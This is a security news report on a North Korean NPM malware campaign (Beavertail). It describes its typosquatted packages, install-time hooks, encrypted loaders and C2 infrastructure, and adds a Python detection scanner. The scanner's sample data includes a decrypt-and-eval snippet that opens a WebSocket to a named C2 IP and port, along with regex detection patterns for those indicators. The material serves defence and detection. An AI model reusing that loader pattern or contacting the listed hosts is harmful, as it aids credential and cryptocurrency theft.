Veracode Threat Research has released an update on an ongoing North Korean cyber-espionage campaign that is actively targeting developers using malicious NPM packages to steal cryptocurrency and sensitive information. The latest wave, tied to the Beavertail malware family, is a continuation of malicious operations first reported in early 2024, but with evolved techniques, new payloads, and expanding infrastructure.
“Our continuous monitoring systems recently flagged four suspicious packages… but our investigation uncovered and we subsequently blocked a total of twelve malicious packages,” Veracode noted.
The attackers strategically published malicious NPM packages like cloud-binary, json-cookie-csv, cloudmedia, and nodemailer-enhancer—some as typosquats of legitimate libraries such as cloudinary. These packages triggered malware downloads through postinstall scripts and obfuscated payloads hidden deep in the node_modules folder.
Even more disturbingly, the malware was triggered during unit tests, simulating real-world developer interview tasks to steal secrets and credentials from candidates’ machines.
“This malware campaign targets developers to trick them into installing malware during an interview exercise… in an apparent attempt to continue to fund the sanctioned country with stolen cryptocurrency.”
The malware observed is believed to be a third variant of Beavertail, capable of targeting Windows, macOS, and Linux systems. The payloads were delivered as AES-256-encrypted files and obfuscated JavaScript, decrypted at run time with custom keys and IVs.
In one package, cloud-binary, the malware ran an AES-decryption function stored in parse.js, immediately followed by an eval() of the decrypted string, which executed the attack logic.
Capabilities included:
- Enumeration of host information
- Theft of crypto wallets, browser extensions, and system files
- Exfiltration of documents, credentials, environment variables, screenshots, and password databases (Keychain)
- Download and execution of Python-based second-stage payloads
- Real-time command execution via WebSocket C2 channels
- VM and sandbox evasion techniques
Veracode discovered heavy reuse of:
- Port 1224 for command-and-control communication
- Static AES keys and IVs
- Identical encryption schemes across packages
- Shared infrastructure like hxxp://144.172.105[.]235 and hxxp://135.181.123[.]177
One variant, nodemailer-enhancer, even stored the malware payload inside a LICENSE file and an obfuscated LICENSE(old) file—an unusual tactic meant to evade review. These files were decrypted with unique but recognizable AES configurations, further pointing to centralized attacker tooling.
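The traits described above (install-time lifecycle hooks, an AES decrypt routine feeding eval(), the reused port 1224 and C2 hosts, and payloads parked in LICENSE-style files) can be turned into a simple static triage check for an unpacked package. The scanner below is an added example, not Veracode's tooling or any of the packages' code; the package.json and file contents it scans are constructed to resemble the reported behaviour and are not the real artifacts.

```python
import json
import re

# Heuristics derived from the campaign traits reported above (assumed thresholds).
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
AES_RE = re.compile(r"createDecipheriv|aes-256", re.I)
EVAL_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(")
# Port and hosts are the indicators named in the report (defanging removed).
C2_RE = re.compile(r":1224\b|144\.172\.105\.235|135\.181\.123\.177")
BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{120,}")  # long base64/hex run, no spaces

def scan_package(package_json: str, files: dict) -> list:
    """Return (rule, location) findings for one unpacked package.

    package_json: raw package.json text; files: {relative path: file text}.
    """
    findings = []
    scripts = json.loads(package_json).get("scripts", {})
    for hook in INSTALL_HOOKS:  # code that runs at npm install time
        if hook in scripts:
            findings.append(("install-hook", f"{hook}: {scripts[hook]}"))
    for path, text in files.items():
        if AES_RE.search(text) and EVAL_RE.search(text):
            findings.append(("aes-then-eval", path))  # decrypt-and-eval loader
        if C2_RE.search(text):
            findings.append(("known-c2", path))
        name = path.rsplit("/", 1)[-1].upper()
        if name.startswith("LICENSE") and BLOB_RE.search(text):
            findings.append(("payload-in-license", path))  # blob in a LICENSE file
    return findings

# Constructed sample package mimicking the described behaviour (not a real package).
SUSPECT_PKG_JSON = json.dumps({"name": "example-pkg", "version": "1.0.0",
                               "scripts": {"postinstall": "node lib/parse.js"}})
SUSPECT_FILES = {
    "lib/parse.js": (
        "const c=require('crypto');"
        "const d=c.createDecipheriv('aes-256-cbc',KEY,IV);"
        "let s=d.update(BLOB,'hex','utf8')+d.final('utf8');eval(s);"
        "const ws=new WebSocket('ws://144.172.105.235:1224');"),
    "LICENSE(old)": "MIT License " + "QUJDREVGRw==" * 12,
}
CLEAN_FILES = {"index.js": "module.exports = (a, b) => a + b;",
               "LICENSE": "MIT License\nPermission is hereby granted..."}

if __name__ == "__main__":
    for rule, where in scan_package(SUSPECT_PKG_JSON, SUSPECT_FILES):
        print(f"[{rule}] {where}")
    print("clean package:", scan_package('{"name":"x"}', CLEAN_FILES))
```

A single hit on the install-hook rule is common in legitimate packages; the combination of a hook with an aes-then-eval loader or a known-c2 match is the signal worth escalating.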
“It appears this malware is under development… This package was found to contain two Beavertail configurations.”
Thanks to Veracode’s Package Firewall technology, most of the malicious packages were automatically detected and blocked before they could spread further. However, eight encrypted and eight non-encrypted variants were found in total, including:
- bingo-logger, succgdess, react-smooth-plugin, json-cookie-jar
- react-router-scroll-navar, rc-logger, preset-log, and others
Veracode notified NPM, and the malicious packages were promptly removed from the ecosystem.